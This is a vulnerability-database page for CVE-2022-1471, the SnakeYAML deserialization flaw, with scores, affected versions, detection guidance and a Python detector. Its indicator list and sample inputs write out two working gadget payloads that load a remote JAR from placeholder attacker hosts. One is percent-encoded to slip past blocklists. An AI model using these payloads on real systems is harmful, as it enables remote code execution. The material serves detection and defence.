cbcvebase.
CVE-2022-1471
published 2022-12-01


Priority: P1 (83) · Severity: critical · CVSS 3.1 base score: 9.8
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 99.61% (99.9th percentile)
SnakeYaml's Constructor() class does not restrict types which can be instantiated during deserialization. Deserializing yaml content provided by an attacker can lead to remote code execution. We recommend using SnakeYaml's SafeConstructor when parsing untrusted content to restrict deserialization. We recommend upgrading to version 2.0 and beyond.

Affected

4 ranges

Vendor                     | Product          | Version range      | Fixed in
apache                     | submarine        | >= 0.7.0 < 0.8.0   | 0.8.0
apache_software_foundation | apache_submarine | >= 0.7.0 < 0.8.0   | 0.8.0
debian                     | snakeyaml        |                    |
snakeyaml_project          | snakeyaml        | < 2.0              | 2.0

Detection & IOCs (extracted from sources)

command: !!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://your-server/yaml-payload.jar"]]]]
command: !!javax.script.S%63riptEngin%65Manager [!!java.net.URLCl%61ssLoader [[!!java.net.URL ["http://attacker.example.com/"]]]]
url: http://3.137.187.148:1337/
ip: 3.137.187.148
port: 51337
path: submarine-server/server-core/src/main/java/org/apache/submarine/server/utils/YamlUtils.java
  • Detect CVE-2022-1471 exploitation attempts by monitoring HTTP request bodies for SnakeYAML deserialization gadget patterns, specifically the '!!' tag prefix combined with 'javax.script.ScriptEngineManager' or 'java.net.URLClassLoader' class instantiation strings.
  • Blocklist bypass via URL/percent-encoding of Java class names in YAML payloads (e.g., 'S%63riptEngin%65Manager', 'URLCl%61ssLoader') — detection rules must decode percent-encoded characters before matching against blocklists.
  • Monitor for outbound HTTP requests from application servers fetching remote JAR files (e.g., 'yaml-payload.jar') shortly after receiving YAML content-type POST requests, which indicates successful SnakeYAML RCE class-loading.
  • For Apache Submarine, monitor POST requests to YAML endpoints (application/yaml content-type) handled by YamlEntityProvider's readFrom method for deserialization gadget payloads.
  • For TorchServe (ShellTorch), chain detection: watch for model upload requests containing YAML files with SnakeYAML gadget tags, especially when the management interface is bound to 0.0.0.0 instead of localhost.
  • Identify vulnerable SnakeYAML versions (prior to 2.0) in software inventory and dependency scans; versions ≤ 1.30 are confirmed affected.
  • For Atlassian products, monitor the Assets Discovery agent communication port (default 51337) for unexpected traffic as a lateral indicator of CVE-2022-1471 exploitation attempts in Jira environments.
  • The exploit payload using percent-encoded class names (e.g., 'S%63riptEngin%65Manager') bypasses simple string-based blocklists; detection rules relying on plain-text keyword matching will miss URL-encoded variants.
  • CVE-2022-1471 affects SnakeYAML by default design: arbitrary Java class instantiation from untrusted YAML is enabled out of the box, meaning any application using SnakeYAML to parse untrusted input is potentially vulnerable regardless of application-level controls.
  • For TorchServe/ShellTorch, CVE-2022-1471 is most dangerous when chained with the unauthenticated management interface misconfiguration (bound to 0.0.0.0) and CVE-2023-43654 SSRF; standalone exploitation requires the ability to upload a model.
  • Apache Submarine fix replaces SnakeYAML with jackson-dataformat-yaml; cherry-picking PR #1054 and rebuilding the submarine-server image is the workaround for versions < 0.8.0 that cannot upgrade.
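The detection points above (match the '!!' tag prefix against gadget class names, and percent-decode before matching so 'S%63riptEngin%65Manager' is not missed) as an added example detector; this is not code from the page or from any of the vendors named. It assumes a simple regex for SnakeYAML global tags, takes its gadget class set from the IoC list on this page, decodes repeatedly so double-encoded bodies are also normalised, and runs over constructed sample request bodies.

```python
from __future__ import annotations

import re
from urllib.parse import unquote

# Gadget classes taken from the IoC strings on this page.
GADGET_CLASSES = {
    "javax.script.ScriptEngineManager",
    "java.net.URLClassLoader",
    "java.net.URL",
}

# SnakeYAML global tag: "!!" followed by a fully qualified Java class name.
TAG_RE = re.compile(r"!!\s*([A-Za-z_][\w$]*(?:\.[A-Za-z_][\w$]*)+)")


def normalize(body: str, max_rounds: int = 3) -> str:
    """Percent-decode until the text stops changing (catches double encoding)."""
    for _ in range(max_rounds):
        decoded = unquote(body)
        if decoded == body:
            break
        body = decoded
    return body


def find_gadget_tags(body: str) -> list[str]:
    """Return the Java classes a YAML body asks SnakeYAML to instantiate.

    Matching runs on the decoded text, so the percent-encoded variant is
    reported under its real class name, not the obfuscated spelling.
    """
    return [m.group(1) for m in TAG_RE.finditer(normalize(body))]


def is_suspicious(body: str) -> bool:
    """True if the body instantiates a known gadget class via a '!!' tag."""
    return any(cls in GADGET_CLASSES for cls in find_gadget_tags(body))


# Constructed sample request bodies: the two IoC payloads above plus a benign document.
SAMPLES = {
    "plain": '!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://your-server/yaml-payload.jar"]]]]',
    "encoded": '!!javax.script.S%63riptEngin%65Manager [!!java.net.URLCl%61ssLoader [[!!java.net.URL ["http://attacker.example.com/"]]]]',
    "benign": "name: job-1\nspec:\n  replicas: 2\n",
}

if __name__ == "__main__":
    for label, body in SAMPLES.items():
        print(f"{label}: suspicious={is_suspicious(body)} tags={find_gadget_tags(body)}")
```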

CVSS provenance

Source         | Version | Score | Severity | Vector
nvd            | v3.1    | 9.8   | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
ghsa           |         | 9.8   | CRITICAL |
osv            |         | 9.8   | CRITICAL |
vendor_oracle  |         | 9.8   | HIGH     |
vendor_debian  |         | 8.3   | LOW      |
vendor_redhat  |         | 8.3   | HIGH     |